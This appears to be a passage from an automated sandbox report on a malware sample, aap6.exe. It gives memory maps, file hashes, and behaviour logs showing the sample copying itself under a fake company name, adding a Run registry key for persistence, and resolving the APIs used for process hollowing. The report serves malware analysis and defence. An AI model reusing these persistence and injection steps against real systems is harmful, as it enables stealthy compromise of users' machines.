| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | - |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x00420fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x00430000 | 0x00432fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00530fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00560fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x00570000 | 0x00574fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00580fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b5fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortkey.nlp | 0x00810000 | 0x00850fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x008cffff | Private Memory | Readable, Writable |
|
|
|
- |
| aap6.exe | 0x00900000 | 0x0093ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| rsaenh.dll | 0x01ed0000 | 0x01f0bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x0200ffff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x02010000 | 0x02063fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x020c0000 | 0x0238efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002390000 | 0x02390000 | 0x0438ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x044cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x046cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000044d0000 | 0x044d0000 | 0x045aefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x0461ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004630000 | 0x04630000 | 0x0466ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x046cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046d0000 | 0x046d0000 | 0x047cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x0483ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x0498ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04deffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04fbffff | Private Memory | Readable, Writable |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x6bb40000 | 0x6bcdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x6d660000 | 0x6ddfbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x6de00000 | 0x6e8f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x6f050000 | 0x6f5fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorjit.dll | 0x6fa10000 | 0x6fa6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74410000 | 0x7441dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74420000 | 0x7445afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74460000 | 0x74475fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74590000 | 0x7459afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x745a0000 | 0x74619fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x74620000 | 0x74669fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74cb0000 | 0x74d4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74ee0000 | 0x74f5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74f70000 | 0x74f77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74f80000 | 0x74fdbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74fe0000 | 0x7501efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75730000 | 0x7573bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75740000 | 0x7579ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757d0000 | 0x7586cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75a90000 | 0x75aeffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75be0000 | 0x75d3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75d40000 | 0x75dcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75dd0000 | 0x75e7bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75e80000 | 0x75ec5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75fb0000 | 0x760bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76380000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x76480000 | 0x770c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x770d0000 | 0x771bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771c0000 | 0x772bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x773c0000 | 0x77416fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x77650000 | 0x77654fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77670000 | 0x7773bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000777e0000 | 0x777e0000 | 0x778fefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000077900000 | 0x77900000 | 0x779f9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77a00000 | 0x77ba8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77be0000 | 0x77d5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe | 240.00 KB |
MD5:
8b70d9183b829c6c958b5ecabe95832f
SHA1: 6bdd34c6f0b0d5224899e47a615ce9d3c70c9f9d SHA256: 8c77918a32167b1ccefb35c6f2a01803515ba6c055ff1d983c7b6c124b42ccd8 |
|
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc | - |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW | type = file_attributes |
|
1 | |
| Get Info | C:\Users | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe | type = file_attributes |
|
1 | |
| Copy | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe | source_filename = C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = DURA Automotive Systems Inc, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = DURA Automotive Systems Inc, data = C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe, size = 188, type = REG_SZ |
|
1 |
Module (341)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 |
|
9 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 |
|
2 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 |
|
11 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 |
|
11 | |
| Get Filename | c:\windows\syswow64\kernel32.dll | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 |
|
10 | |
| Get Filename | c:\windows\syswow64\advapi32.dll | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 |
|
9 | |
| Get Filename | c:\windows\syswow64\ntdll.dll | process_name = c:\users\kft6utqw\appdata\roaming\aap6.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x75fc49d7 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetKernelObjectSecurity, address_out = 0x77754645 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetKernelObjectSecurity, address_out = 0x7775462d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessA, address_out = 0x75fc1072 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadContext, address_out = 0x75fe79d4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadContext, address_out = 0x76045393 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadProcessMemory, address_out = 0x75fdcfcc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x75fdd9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x77bffc70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x75fdd9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x75fc43ef |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
3 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = appdata, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
3 |
Process #4: aap6.exe
149
7
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\kft6utqw\appdata\roaming\aap6.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:14:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa10 |
| Parent PID | 0x9f8 (c:\users\kft6utqw\appdata\roaming\aap6.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A14
0x
A1C
0x
A20
0x
A30
0x
A34
0x
A38
0x
A3C
0x
A80
0x
A84
0x
A88
0x
A8C
0x
A90
0x
A94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0016ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x002f0000 | 0x002f2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x003d0000 | 0x003d4fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00433fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x006cefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortkey.nlp | 0x006d0000 | 0x00710fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0081ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| wbemdisp.tlb | 0x00830000 | 0x0083efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00846fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00851fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| custommarshalers.dll | 0x00860000 | 0x00874fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0089ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x008a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| stdole2.tlb | 0x008a0000 | 0x008a3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008effff | Private Memory | Readable, Writable |
|
|
|
- |
| aap6.exe | 0x00900000 | 0x0093ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00c50fff | Pagefile Backed Memory | Readable |
|
|
